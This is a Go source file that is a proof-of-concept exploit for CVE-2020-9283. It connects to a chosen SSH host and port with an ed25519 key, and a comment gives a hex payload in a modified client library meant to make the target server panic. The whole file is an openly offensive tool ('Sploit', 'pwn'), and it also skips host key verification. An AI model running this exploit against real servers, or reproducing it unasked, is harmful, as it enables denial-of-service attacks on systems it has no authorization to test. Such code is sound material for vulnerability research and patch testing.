package main

import (
	"flag"
	"fmt"
	"io/ioutil"
	"net"

	"golang.org/x/crypto/ssh"
)

var host, port, key *string

// This project is inspired by the Python PoC created here github.com/mark-adams/exploits/CVE-2020-9283
// Generate SSH key with ssh-keygen -f thekey -t ssh-ed25519 -N ''
// The payload used to trigger the panic is located in client_auth.go and is the value "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161"
func main() {
	host = flag.String("host", "localhost", "IP address of SSH host to target")
	port = flag.String("port", "22", "Port to target")
	key = flag.String("key", "thekey", "ssh-ed25519 private key to use")

	flag.Parse()
	fmt.Println("[+] Sploit for CVE-2020-9283")
	pwn(*host, *port, *key)
}

func pwn(host, port, key string) {
	fmt.Printf("[+] Attempting to pwn: %s\n", host+":"+port)
	setupKeyAndDial(host+":"+port, "notme", key)
	fmt.Println("[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'")
}

func setupKeyAndDial(addr, user, keyfile string) *ssh.Client {
	key, err := ioutil.ReadFile(keyfile)
	if err != nil {
		fmt.Println("[ERROR]", err)
	}

	signer, err := ssh.ParsePrivateKey(key)
	if err != nil {
		fmt.Println("[ERROR]", err)
	}

	config := &ssh.ClientConfig{
		User: user,
		Auth: []ssh.AuthMethod{
			ssh.PublicKeys(signer),
		},
		HostKeyCallback: ssh.HostKeyCallback(func(hostname string, remote net.Addr, key ssh.PublicKey) error { return nil }),
	}
	return Dial("tcp", addr, config)
}

func Dial(network, addr string, config *ssh.ClientConfig) *ssh.Client {
	client, err := ssh.Dial(network, addr, config)
	if err != nil {
		panic(err)
	}
	return client
}
